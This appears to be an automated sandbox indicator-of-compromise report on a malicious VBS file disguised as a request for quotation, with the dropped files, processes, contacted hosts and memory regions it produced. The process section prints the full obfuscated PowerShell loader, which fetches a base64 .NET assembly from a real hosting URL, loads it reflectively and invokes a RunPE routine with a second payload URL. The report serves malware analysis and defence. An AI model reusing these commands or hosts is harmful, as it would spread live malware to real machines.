IOC Report
RFQ 2024.09.26-89 vivecta.vbs

loading gif

Files

File Path
Type
Category
Malicious
RFQ 2024.09.26-89 vivecta.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ehmoyid.0uz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ajuujzvq.qqk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gkzc0izb.yde.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_he5jyahw.re5.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ 2024.09.26-89 vivecta.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2KSB8IGlOVk9LZS1lWHBSRVNTSW9O';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1'+'}ur'+'l '+'= {0}https:/'+'/ia600100'+'.us'+'.arch'+'iv'+'e.org'+'/24'+'/ite'+'ms/'+'d'+'eta'+'h-'+'no'+'t'+'e-v/De'+'tah'+'NoteV.tx'+'t'+'{0'+'}'+';{1}base6'+'4Content = (N'+'ew'+'-O'+'b'+'je'+'ct System.Net.'+'WebClie'+'nt).'+'Downlo'+'a'+'dStrin'+'g({'+'1}url);'+'{1}bi'+'n'+'aryCon'+'tent = [Sy'+'stem'+'.'+'Convert]::From'+'Bas'+'e'+'64'+'String'+'({'+'1}base64Cont'+'ent)'+';{1}'+'assembly = '+'['+'Refl'+'e'+'ction.Ass'+'embly]:'+':Load({'+'1}bin'+'aryCont'+'en'+'t'+');{1}typ'+'e ='+' '+'{1}a'+'s'+'s'+'em'+'bl'+'y.'+'GetT'+'yp'+'e('+'{0'+'}'+'RunPE.Home'+'{0'+'})'+';{'+'1'+'}meth'+'od = '+'{'+'1}'+'type.G'+'etM'+'eth'+'o'+'d({0}V'+'AI{0})'+';{'+'1}me'+'t'+'h'+'od.Invoke({'+'1}null, [object['+']]@'+'({0}'+'txt.k'+'ns'+'b/ve'+'d.2r.cdfd77'+'2bf9971'+'a39'+'3084'+'5d0'+'6'+'84'+'8c6436'+'-b'+'up//:spt'+'th{0} , '+'{0}desati'+'vado{0} , '+'{0}des'+'ativado{0} , {0'+'}desa'+'tivad'+'o{0},{0}AddInProcess'+'3'+'2'+'{0'+'},{0}{0}))') -f [cHar]39,[cHar]36) | iNVOKe-eXpRESSIoN"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://www.J.
unknown
https://www.cloudflare.com/learning/access-management/phishing-attack/
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://pub-6346c84860d5480393a1799fb277dfdc.r2.dev
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://aka.ms/pscore6
unknown
https://pub-6346c84860d5480393a1799fb277dfdc.r2.dev
unknown
https://github.com/Pester/Pester
unknown
https://www.cloudflare.com/5xx-error-landing
unknown
https://ia600100.us.arXJW
unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
207.241.227.240
https://pub-6346c84860d5480393a1799fb277dfdc.r2.dev/bsnk.txt
172.66.0.235
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
https://ia600100.us.archive.org
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://oneget.org
unknown
http://ia600100.us.archive.org
unknown
There are 15 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
pub-6346c84860d5480393a1799fb277dfdc.r2.dev
172.66.0.235
ia600100.us.archive.org
207.241.227.240

IPs

IP
Domain
Country
Malicious
172.66.0.235
pub-6346c84860d5480393a1799fb277dfdc.r2.dev
United States
207.241.227.240
ia600100.us.archive.org
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
217A3CCD000
trusted library allocation
page read and write
malicious
217ABD20000
trusted library section
page read and write
malicious
21793E27000
trusted library allocation
page read and write
21791790000
heap
page read and write
7FFB1E0F6000
unkown
page readonly
7FFB1E0F6000
unkown
page readonly
7FFAACCB0000
trusted library allocation
page read and write
21794D2C000
trusted library allocation
page read and write
265FD9F0000
heap
page read and write
7FFAACB13000
trusted library allocation
page execute and read and write
217AB9FB000
heap
page read and write
25AF9883000
heap
page read and write
25AF9511000
heap
page read and write
25AF763E000
heap
page read and write
21793C95000
trusted library allocation
page read and write
265FB9D8000
heap
page read and write
25AF96B6000
heap
page read and write
217918DB000
heap
page read and write
21793CBD000
trusted library allocation
page read and write
25AF953A000
heap
page read and write
7FFAACC30000
trusted library allocation
page execute and read and write
7FFAACB20000
trusted library allocation
page read and write
265FBAF0000
trusted library allocation
page read and write
7FFAACD00000
trusted library allocation
page execute and read and write
25AF962F000
heap
page read and write
7FFB1E102000
unkown
page readonly
25AF95D1000
heap
page read and write
25AF76B8000
heap
page read and write
217AB776000
heap
page read and write
25AF7611000
heap
page read and write
25AF9630000
heap
page read and write
21791810000
trusted library allocation
page read and write
21791690000
heap
page read and write
265FDBDF000
heap
page read and write
265FD830000
heap
page execute and read and write
7FFB1E100000
unkown
page read and write
25AF96B4000
heap
page read and write
25AF9849000
heap
page read and write
265804CB000
trusted library allocation
page read and write
21793A81000
trusted library allocation
page read and write
21791AA0000
heap
page read and write
26590010000
trusted library allocation
page read and write
7FFAACD90000
trusted library allocation
page read and write
D9E157E000
stack
page read and write
25AF94C6000
heap
page read and write
265FDBBB000
heap
page read and write
25AF94C9000
heap
page read and write
7FFB1E100000
unkown
page read and write
7FFAACD60000
trusted library allocation
page read and write
25AF94C9000
heap
page read and write
217A36B1000
trusted library allocation
page read and write
25AF94E6000
heap
page read and write
D9E258D000
stack
page read and write
21793E1E000
trusted library allocation
page read and write
265FB963000
heap
page read and write
7FFB1E102000
unkown
page readonly
25AF94E0000
heap
page read and write
25AF9511000
heap
page read and write
265FBA70000
heap
page read and write
265FB994000
heap
page read and write
21793CAD000
trusted library allocation
page read and write
25AF95F8000
heap
page read and write
21793F7E000
trusted library allocation
page read and write
21793A92000
trusted library allocation
page read and write
25AF95D4000
heap
page read and write
217936A0000
heap
page read and write
D9E14FD000
stack
page read and write
7FFAACD80000
trusted library allocation
page read and write
7FFAACD25000
trusted library allocation
page read and write
217A36C0000
trusted library allocation
page read and write
7FFAACB30000
trusted library allocation
page read and write
25AF953A000
heap
page read and write
217A39AD000
trusted library allocation
page read and write
25AF9866000
heap
page read and write
7FFAACBD0000
trusted library allocation
page execute and read and write
D9E15FE000
stack
page read and write
265FDA56000
heap
page read and write
265805FC000
trusted library allocation
page read and write
C2CB27E000
stack
page read and write
7FFAACE00000
trusted library allocation
page read and write
217AB7B0000
heap
page execute and read and write
25AF961D000
heap
page read and write
217AB850000
heap
page read and write
25AF9890000
heap
page read and write
C2CAEF9000
stack
page read and write
21794F5D000
trusted library allocation
page read and write
26580536000
trusted library allocation
page read and write
265FBAC0000
heap
page read and write
25AF9521000
heap
page read and write
25AF97C0000
heap
page read and write
25AF94C2000
heap
page read and write
7FFAACBC6000
trusted library allocation
page read and write
25AF7600000
heap
page read and write
265FBA3C000
heap
page read and write
7FFB1E100000
unkown
page read and write
265FB950000
heap
page read and write
217919D4000
heap
page read and write
21791840000
heap
page readonly
7FFAACCB2000
trusted library allocation
page read and write
25AF94F1000
heap
page read and write
217ABBD0000
heap
page read and write
7FFAACDB0000
trusted library allocation
page read and write
25AF78E5000
heap
page read and write
21793597000
heap
page read and write
7FFAACD10000
trusted library allocation
page read and write
25AF98C0000
heap
page read and write
25AF95C4000
heap
page read and write
C2CACFC000
stack
page read and write
25AF952E000
heap
page read and write
C2CB0FE000
stack
page read and write
7FFB1E0E1000
unkown
page execute read
25AF9890000
heap
page read and write
7FFAACB2B000
trusted library allocation
page read and write
D9E1839000
stack
page read and write
21791850000
heap
page read and write
21793A7F000
trusted library allocation
page read and write
217A399F000
trusted library allocation
page read and write
7FFAACE40000
trusted library allocation
page read and write
2658010B000
trusted library allocation
page read and write
25AF96B4000
heap
page read and write
21794FE4000
trusted library allocation
page read and write
21793ABA000
trusted library allocation
page read and write
25AF96B4000
heap
page read and write
25AF9850000
heap
page read and write
25AF95E8000
heap
page read and write
265FB959000
heap
page read and write
21794D32000
trusted library allocation
page read and write
7FFAACCE0000
trusted library allocation
page execute and read and write
25AF94D1000
heap
page read and write
25AF997A000
heap
page read and write
7FFAACB14000
trusted library allocation
page read and write
25AF9526000
heap
page read and write
7FFAACE99000
trusted library allocation
page read and write
D9E116E000
stack
page read and write
21791AA4000
heap
page read and write
21793A8A000
trusted library allocation
page read and write
265FBAB6000
heap
page read and write
D9E167E000
stack
page read and write
7FFAACDA0000
trusted library allocation
page read and write
2179532E000
trusted library allocation
page read and write
7FFAACB20000
trusted library allocation
page read and write
D9E1ABE000
stack
page read and write
25AF9890000
heap
page read and write
FFBE9FB000
stack
page read and write
2658009C000
trusted library allocation
page read and write
25AF9890000
heap
page read and write
25AF94C1000
heap
page read and write
25AF95C1000
heap
page read and write
25AF953A000
heap
page read and write
D9E16F8000
stack
page read and write
25AF9608000
heap
page read and write
D9E250E000
stack
page read and write
7FFAACB1D000
trusted library allocation
page execute and read and write
26580023000
trusted library allocation
page read and write
265FB860000
heap
page read and write
7FFAACD80000
trusted library allocation
page read and write
265FBBA0000
trusted library allocation
page read and write
7FFAACCC1000
trusted library allocation
page read and write
7FFAACB14000
trusted library allocation
page read and write
26580606000
trusted library allocation
page read and write
7FFAACD10000
trusted library allocation
page read and write
26590073000
trusted library allocation
page read and write
21791830000
trusted library allocation
page read and write
25AF985D000
heap
page read and write
C2CA99F000
stack
page read and write
7FFAACE20000
trusted library allocation
page read and write
7FFAACD20000
trusted library allocation
page read and write
7FFAACD40000
trusted library allocation
page read and write
25AF75A0000
heap
page read and write
25AF97A9000
heap
page read and write
21791892000
heap
page read and write
217AB853000
heap
page read and write
217AB9A2000
heap
page read and write
265FBA3F000
heap
page read and write
7FFAACE94000
trusted library allocation
page read and write
217AB706000
heap
page read and write
25AF997A000
heap
page read and write
7FFAACDE0000
trusted library allocation
page read and write
21793732000
trusted library allocation
page read and write
7FFAACE30000
trusted library allocation
page read and write
2658015B000
trusted library allocation
page read and write
265FB990000
heap
page read and write
7FFB1E0E1000
unkown
page execute read
7FFAACBCC000
trusted library allocation
page execute and read and write
7FFB1E105000
unkown
page readonly
7FFAACC30000
trusted library allocation
page execute and read and write
7FFAACD60000
trusted library allocation
page read and write
7FFAACD30000
trusted library allocation
page read and write
FFBE8FE000
stack
page read and write
25AF94F6000
heap
page read and write
217918D7000
heap
page read and write
25AF94CA000
heap
page read and write
7FFAACDF0000
trusted library allocation
page read and write
21794F88000
trusted library allocation
page read and write
7FFB1E0E0000
unkown
page readonly
265FD857000
heap
page execute and read and write
7FFAACCC1000
trusted library allocation
page read and write
7FFAACD40000
trusted library allocation
page read and write
C2CAF77000
stack
page read and write
217AB7B6000
heap
page execute and read and write
25AF94D4000
heap
page read and write
21791898000
heap
page read and write
25AF94D1000
heap
page read and write
25AF97C1000
heap
page read and write
7FFAACBF6000
trusted library allocation
page execute and read and write
7FFAACB10000
trusted library allocation
page read and write
C2CAE7E000
stack
page read and write
7FFAACEA3000
trusted library allocation
page read and write
25AF9637000
heap
page read and write
25AF95C0000
heap
page read and write
265FDBA0000
heap
page read and write
7FFAACBC0000
trusted library allocation
page read and write
7FFAACD70000
trusted library allocation
page read and write
217AB970000
heap
page read and write
21791980000
trusted library allocation
page read and write
25AF94C3000
heap
page read and write
D9E19BE000
stack
page read and write
D9E1B3B000
stack
page read and write
2179497E000
trusted library allocation
page read and write
25AF7626000
heap
page read and write
217AB99C000
heap
page read and write
217A3724000
trusted library allocation
page read and write
FFBE4FF000
stack
page read and write
7FFAACDC0000
trusted library allocation
page read and write
25AF9516000
heap
page read and write
265804FA000
trusted library allocation
page read and write
25AF95CD000
heap
page read and write
7FFAACBC0000
trusted library allocation
page read and write
7FFAACCCA000
trusted library allocation
page read and write
7FFAACB6C000
trusted library allocation
page execute and read and write
21793A75000
trusted library allocation
page read and write
265FDE40000
heap
page read and write
25AF953A000
heap
page read and write
7FFAACDB0000
trusted library allocation
page read and write
FFBE0FE000
stack
page read and write
D9E147E000
stack
page read and write
25AF9868000
heap
page read and write
7FFAACEA0000
trusted library allocation
page read and write
7FFAACDD0000
trusted library allocation
page read and write
25AF985C000
heap
page read and write
21795264000
trusted library allocation
page read and write
25AF983B000
heap
page read and write
217AB76B000
heap
page read and write
7FFAACB12000
trusted library allocation
page read and write
C2CA91E000
stack
page read and write
217AB6C0000
heap
page read and write
265FBB20000
heap
page readonly
7FFAACDD0000
trusted library allocation
page read and write
25AF98C1000
heap
page read and write
2658011B000
trusted library allocation
page read and write
25AF76D0000
heap
page read and write
25AF78E0000
heap
page read and write
21794D44000
trusted library allocation
page read and write
25AF94C2000
heap
page read and write
7FFAACDE0000
trusted library allocation
page read and write
C2CB17E000
stack
page read and write
2179532A000
trusted library allocation
page read and write
25AF960D000
heap
page read and write
25AF7830000
heap
page read and write
217917D0000
heap
page read and write
C2CA9DE000
stack
page read and write
25AF9890000
heap
page read and write
7FFAACDA0000
trusted library allocation
page read and write
21794D56000
trusted library allocation
page read and write
7FFAACD50000
trusted library allocation
page read and write
7FFAACE70000
trusted library allocation
page read and write
7FFAACCE0000
trusted library allocation
page execute and read and write
21791770000
heap
page read and write
217A46CD000
trusted library allocation
page read and write
C2CAFFD000
stack
page read and write
217AB830000
heap
page read and write
D9E173F000
stack
page read and write
7FFAACBC6000
trusted library allocation
page read and write
25AF986A000
heap
page read and write
7FFAACB13000
trusted library allocation
page execute and read and write
FFBE3FF000
stack
page read and write
25AF9884000
heap
page read and write
265FDAA0000
heap
page read and write
265FBA50000
heap
page read and write
217919D6000
heap
page read and write
7FFAACE81000
trusted library allocation
page read and write
21793AB6000
trusted library allocation
page read and write
21791870000
heap
page read and write
7FFAACDC0000
trusted library allocation
page read and write
D9E1A3E000
stack
page read and write
217919C0000
trusted library allocation
page read and write
25AF9506000
heap
page read and write
7FFAACE50000
trusted library allocation
page read and write
217AB6B0000
heap
page read and write
265803BF000
trusted library allocation
page read and write
7FFAACE30000
trusted library allocation
page read and write
25AF94C5000
heap
page read and write
21794D52000
trusted library allocation
page read and write
25AF95FD000
heap
page read and write
265FD800000
heap
page read and write
25AF9608000
heap
page read and write
265FDA4C000
heap
page read and write
21794D79000
trusted library allocation
page read and write
265FBAB0000
heap
page read and write
7FFAACD90000
trusted library allocation
page read and write
217AB766000
heap
page read and write
217AB940000
heap
page execute and read and write
25AF9859000
heap
page read and write
265FB9B0000
heap
page read and write
26580117000
trusted library allocation
page read and write
D9E10E3000
stack
page read and write
7FFAACD00000
trusted library allocation
page execute and read and write
26580069000
trusted library allocation
page read and write
25AF97A9000
heap
page read and write
25AF95DD000
heap
page read and write
25AF9618000
heap
page read and write
7FFAACD30000
trusted library allocation
page read and write
217AB704000
heap
page read and write
265FDA30000
heap
page read and write
25AF94D6000
heap
page read and write
265FB99A000
heap
page read and write
7FFAACCD0000
trusted library allocation
page execute and read and write
25AF7636000
heap
page read and write
265FB9DD000
heap
page read and write
25AF953A000
heap
page read and write
25AF7637000
heap
page read and write
25AF9846000
heap
page read and write
265FB998000
heap
page read and write
21793A8E000
trusted library allocation
page read and write
7FFAACD70000
trusted library allocation
page read and write
217919D0000
heap
page read and write
217AB768000
heap
page read and write
25AF7570000
heap
page read and write
FFBE7FE000
stack
page read and write
C2CB2FB000
stack
page read and write
7FFAACB1D000
trusted library allocation
page execute and read and write
7FFAACE10000
trusted library allocation
page read and write
25AF96B4000
heap
page read and write
265FD990000
heap
page execute and read and write
25AF9846000
heap
page read and write
265FD9A0000
heap
page read and write
25AF986A000
heap
page read and write
7FFAACCD0000
trusted library allocation
page execute and read and write
7FFAACBD0000
trusted library allocation
page execute and read and write
7FFAACCF2000
trusted library allocation
page read and write
FFBE6FD000
stack
page read and write
21793DBC000
trusted library allocation
page read and write
7FFB1E0E0000
unkown
page readonly
D9E11EE000
stack
page read and write
2179189E000
heap
page read and write
7FFAACBF6000
trusted library allocation
page execute and read and write
25AF9628000
heap
page read and write
7FFAACCF2000
trusted library allocation
page read and write
217936B1000
trusted library allocation
page read and write
C2CB07B000
stack
page read and write
21791890000
heap
page read and write
25AF94CA000
heap
page read and write
21791A70000
heap
page execute and read and write
25AF96B4000
heap
page read and write
25AF95ED000
heap
page read and write
7FFAACDF0000
trusted library allocation
page read and write
7DF40DBF0000
trusted library allocation
page execute and read and write
FFBE1FE000
stack
page read and write
25AF7580000
heap
page read and write
C2CADFE000
stack
page read and write
7FFAACBCC000
trusted library allocation
page execute and read and write
265FDAC0000
heap
page read and write
25AF94C6000
heap
page read and write
265FDA94000
heap
page read and write
25AF9501000
heap
page read and write
7FFAACE20000
trusted library allocation
page read and write
217918B0000
heap
page read and write
21791858000
heap
page read and write
C2CAC7E000
stack
page read and write
7FFAACD50000
trusted library allocation
page read and write
7FFAACCCA000
trusted library allocation
page read and write
26590001000
trusted library allocation
page read and write
25AF96B5000
heap
page read and write
D9E18BD000
stack
page read and write
25AF985A000
heap
page read and write
7FFAACE10000
trusted library allocation
page read and write
7FFAACE60000
trusted library allocation
page read and write
265FBB10000
trusted library allocation
page read and write
265FBBE5000
heap
page read and write
25AF9635000
heap
page read and write
C2CA893000
stack
page read and write
D9E17B7000
stack
page read and write
21791950000
trusted library allocation
page read and write
7FFAACE01000
trusted library allocation
page read and write
D9E193E000
stack
page read and write
25AF950A000
heap
page read and write
25AF9529000
heap
page read and write
C2CAD7E000
stack
page read and write
2658001B000
trusted library allocation
page read and write
7FFAACEB0000
trusted library allocation
page read and write
21793AE0000
trusted library allocation
page read and write
265FBBE0000
heap
page read and write
26580001000
trusted library allocation
page read and write
21794D7E000
trusted library allocation
page read and write
25AF94C0000
heap
page read and write
21791944000
heap
page read and write
217AB984000
heap
page read and write
217938D3000
trusted library allocation
page read and write
FFBDDAA000
stack
page read and write
265FD850000
heap
page execute and read and write
25AF9601000
heap
page read and write
7FFB1E105000
unkown
page readonly
26580107000
trusted library allocation
page read and write
26580161000
trusted library allocation
page read and write
There are 394 hidden memdumps, click here to show them.